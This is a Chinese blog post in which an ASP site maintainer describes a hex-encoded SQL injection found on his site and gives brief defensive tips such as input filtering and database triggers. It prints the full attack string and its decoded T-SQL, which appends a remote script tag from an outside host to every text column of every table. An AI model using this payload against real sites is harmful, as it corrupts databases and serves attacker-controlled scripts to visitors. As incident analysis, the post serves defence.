ASP 二进制SQL注入程序思索

最新推荐文章于 2025-12-05 12:37:18 发布
最新推荐文章于 2025-12-05 12:37:18 发布 · 84 阅读 · 0
文章标签:

#数据库

本文介绍了一种复杂的SQL注入攻击手段,攻击者将SQL语句编译成二进制执行,增加了防御难度。文章探讨了此类攻击的特点,并提出了通过数据访问类过滤及数据库触发器等方法进行有效防护。

最近维护一个ASP网站,发现其被SQL注入,和往常的SQL注入不同的是他居然吧SQL语句编译成了二进制,然后再执行SQL写一个存储过程,然后再执行,最后删除存储过程,让你无际可循。说实话,我很佩服现在的黑客,如果可以我也想学学,这是怎么写出来的。。呵呵 下面是他执行的SQL的源码

dEcLaRe%20@S%20VaRcHaR(4000)%20SeT%20@s=cAsT(0x4445434C415245204054205641524348415228323535292C404320564152434841522832353529204445434C415245205461626C655F437572736F7220435552534F5220464F522053454C45435420612E6E616D652C622E6E616D652046524F4D207379736F626A6563747320612C737973636F6C756D6E73206220574845524520612E69643D622E696420414E4420612E78747970653D27752720414E442028622E78747970653D3939204F5220622E78747970653D3335204F5220622E78747970653D323331204F5220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20455845432827555044415445205B272B40542B275D20534554205B272B40432B275D3D525452494D28434F4E5645525428564152434841522834303030292C5B272B40432B275D29292B27273C736372697074207372633D687474703A2F2F636E2E6A786D6D74762E636F6D2F636E2E6A733E3C2F7363726970743E27272729204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20aS%20VaRcHaR(4000));eXeC(@s)

经过编译 其实就是这个样子

DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR SELECT a.name,b.name FROM sysobjects a,syscolumns b WHERE a.id=b.id AND a.xtype='u' AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN EXEC('UPDATE ['+@T+'] SET ['+@C+']=RTRIM(CONVERT(VARCHAR(4000),['+@C+']))+''<mce:script src="http://cn.jxmmtv.com/cn.js" mce_src="http://cn.jxmmtv.com/cn.js"></mce:script>''') FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor

是不是 看得你脑壳大 。。。没办法 其实我的脑壳也很大 这些代码的出处为 http://blog.youkuaiyun.com/tkjune/archive/2009/01/03/3687728.aspx

加上以前的那些东东,其实也让我恍然一下想起了很多。原来原理都是一样啊,通过那些不注意对自己的ID那些进行加密的网站的URL 例如 Class.asp?id=1 这些进行加后缀然后SQL注入攻击。那我们如何防御呢。

思想很简单,其实就是过滤这些增 删 改 差字段。在你的数据访问类里面进行过滤。针对一些汇编语言的SQL注入,我建议大家还是对输入的SQL进行二进制的转码 然后再对比。然后过滤。如果考虑安全性考虑,我觉得还是应该在数据库里面写触发器 通过触发器进行SQL语句的过滤

iteye_4537
关注
二进制手的Web路(sql注入
MozhuCY的博客
02-08 824
想入门一下Web,非常的那种。 那这几天系统的学一下SQL注入吧   那么什么是SQL注入呢。SQL数据库的一种,一般的SQL查询语句大概就是SELECT * FROM * WHERE * ,类似这种语句一般都会在PHP代码中构造好,预留出一个空,在取得客户端的用户输入的数值,将其填入,这时,如果不进行过滤的防护措施,不法用户所输入的恶意代码也可能被执行,进而达到控制数据库的效果,先举一个例...
采用二进制代码的SQL注入攻击
备忘录
01-03 9577
--更新 01/03 02:12AM--发现代码中并无出奇, 只是将几年前的冷饭再炒.因为多年过去了, 可能有人疏忽, 多试一些总有人中招的.注入方式中数字字段是最容易进入的. 文本也可以, 但在QUERYSTRING中提交文本的情况不如数字多.最常见的就是形如 news.asp?id=3在ASP中,疏忽的写法为aspID=request("id")SQL="SELECT * FROM NEWS
二进制SQL注入漏洞分析
weixin_30696427的博客
07-18 165
摘自:http://blog.youkuaiyun.com/tkjune/archive/2009/01/03/3687728.aspx 发现代码中并无出奇, 只是将几年前的冷饭再炒.因为多年过去了, 可能有人疏忽, 多试一些总有人中招的. 注入方式中数字字段是最容易进入的. 文本也可以, 但在QUERYSTRING中提交文本的情况不如数字多. 最常见的就是形如 news.asp?id=3 在ASP中...
SQL注入之宽字节注入、堆叠注入、二次注入
m0_61506558的博客
09-17 1415
渗透的学习,必须要心无旁骛,通过靶场实战不断总结经验,vulnhub、hackthebox......这些靶场,如果有一个知识点没有掌握就会卡着动不了,之前整理sql注入的文章有点杂,主要原因是此部分内容较多。(一)宽字节注入如今有很多人在编码的时候,大多数人对程序的编码都使用unicode编码,网站都使用utf-8来一个统一国际规范。但仍然有很多,包括国内及国外(特别是非英语国家)的一些cms,仍然使用着自己国家的一套编码,比如gbk,作为自己默认的编码类型。
asp.net(c#)实现从sqlserver存取二进制图片的代码
01-01
下面说说主要实现思路: 1、存取图片 (1)、将图片文件转换为二进制并直接存进sql server 代码如下: //UploadHelper.cs /// <summary> /// 将图片转化为长二进制 /// </summary> /// ”photopath”></param> /// ...
zhuru.rar_SQL inject_asp注入_sql 注入_sql注入_zhuru sql
09-14
在"zhuru.rar"这个压缩包中,包含了一个用于SQL注入测试的ASP(Active Server Pages)小程序。通过这个程序,我们可以了解SQL注入的基本原理以及如何防止此类攻击。 标题中的"SQL inject"和"asp注入"揭示了这个测试...
ASP.NET实现图片以二进制的形式存入数据库
01-02
本文以实例形式讲述了ASP.NET实现图片以二进制的形式存入数据库的方法。过去我们都是直接在数据库中存入图片文件名的,还没有试过存储整张图片到数据库中,经过一番资料查询与测试,整理出了如下的功能代码: 1.建立...
C#实现把图片转换成二进制以及把二进制转换成图片的方法示例
08-30
C#实现图片与二进制相互转换及数据库存储 本文主要介绍了C#实现把图片转换成二进制以及把二进制转换成图片的方法,并结合具体实例形式分析了基于C#的图片与二进制相互转换以及图片保存到数据库的相关操作技巧。 一...
[逆向工程] Linux 二进制分析(3):ELF 代码注入技术
[热爱分享]希望大家都能花时间在学习自己喜欢的东西上
05-12 1674
逆向工程实验三:Linux 二进制分析(3)
SQL注如绕过;防御SQL注如
weixin_33610780的博客
07-18 150
sql盲注之二进制注入二进制盲注(Binary Blind Injection)是一种特殊的SQL注如技术,它结合了盲注和二进制注入的特点。在这种公鸡中,公鸡者无法直接看到SQL查询的结果,因此他们需要通过其他方式来推断数据库的响应。二进制盲注通常涉及到将二进制数据插入到SQL查询中,并通过观察应用程序的行为来推断注入是否...
一个二进制代码注入器(用于感染ELF文件)(转)
Fangrn的专栏
08-12 1660
主要是修改ELF头结构以及段头结构,节头结构中的一些项,以达到插入病毒代码的目的。利用一段示例的二进制代码作为病毒进行演示。本次达到的目的是编程实现ELF文件感染器,并没有写出真正的病毒代码,只是实现第一部感染过程。使测试代码先于被感染的程序执行。   我们需要对ELF文件做的修改: 1 修正"ELF header"中的 e_shoff ,增加 PAGESIZE 大小 2 修正寄生代码...
[转载]深入理解SQL注入绕过WAF和过滤机制
weixin_33991727的博客
06-27 2502
知己知彼,百战不殆 --孙子兵法 [目录] 0x0 前言 0x1 WAF的常见特征 0x2 绕过WAF的方法 0x3 SQLi Filter的实现及Evasion 0x4 延伸及测试向量示例 0x5 本文小结 0x6 参考资料 0x0 前言 促使本文产生最初的动机是前些天在做测试时一些攻击向量被WAF挡掉了,而且遇到异常输入直接发生重定向。之前对WAF并不太了解,因此趁此...
sql语句中插入二进制数据
qq_36448919的博客
11-20 2058
保存二进制数据 这段代码是将数据库中的二进制数据取出插入 保存图片 这段代码是将页面上的图片存入数据库 总之,SqlServer重罚插入二进制数据SqlParameter这个东西。
SQL注入详解
热门推荐
huangyongkang666的博客
03-20 4万+
SQL注入详解 1.SQL注入简介 ​ SQL注入是比较常见的网络攻击方式之一,它不是利用操作系统的BUG来实现攻击,而是针对程序员编写时的疏忽,通过SQL语句,实现无账号登录,甚至篡改数据库。 ​ Sql 注入攻击是通过将恶意的 Sql 查询或添加语句插入到应用的输入参数中,再在后台 Sql 服务器上解析执行进行的攻击,它目前黑客对数据库进行攻击的最常用手段之一 2. sql 注入产生原因及威胁 ​ 当我们访问动态网页时, Web 服务器会向数据访问层发起 Sql 查询请求,如果权限验证通过就会执行
NineData社区版V4.7.0发布!新增MySQL至TiDB等6条数据复制对比链路,SQL窗口新增谷歌云6种数据源类型
最新发布
云原生智能数据管理平台
12-05 798
NineData社区版V4.7.0正式发布,新增6条数据复制链路(包括MySQL至OceanBase/TiDB等5条跨源链路和1条同构链路),均支持全流程数据同步与对比功能。同时新增6种谷歌云数据源支持,优化了MongoDB内网复制和MySQL XA事务性能。该版本现已支持27种数据库迁移链路,提供包括SQL审核、结构设计等企业级DevOps能力。作为免费开源工具,NineData社区版支持Docker快速部署,具备高性能CDC同步技术,适用于数据库迁移、容灾、ETL等场景,5-10分钟即可完成安装体验。
【免费云平台部署指南】按场景选型+全维度对比(附直达地址)
分享技术干货,聚焦AI前沿科技
12-03 951
免费云平台已能覆盖从静态网站到AI模型部署的大部分场景,核心是根据项目类型(静态/后端/AI)、访问地区(国内/国外)和功能需求(数据库/容器/GPU)选择适配平台。新手建议从简单场景入手(如GitHub Pages部署博客、Hugging Face Spaces部署AI Demo),熟悉后再尝试全栈或容器化部署。
001-计算机实验报告之数据库原理实验报告
LF__plus的博客
12-02 240
001-计算机实验报告之数据库原理实验报告 一共四个实验,分别是:1、使用powerdesigner建模;2、在idea里操作数据库;3、在数据库实现多种查询,如简单查询,连接查询,嵌套查询,分组查询等;4、视图创建
ASP.NET下SQL Server图片二进制存取方法详解
存储图片到数据库中时,需要将图片文件读取成二进制流,然后将这个二进制流作为字节数组存储到数据库二进制字段中,比如SQL Server中的VARBINARY类型字段。相反,从数据库中读取图片时,需要从数据库中获取字节...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值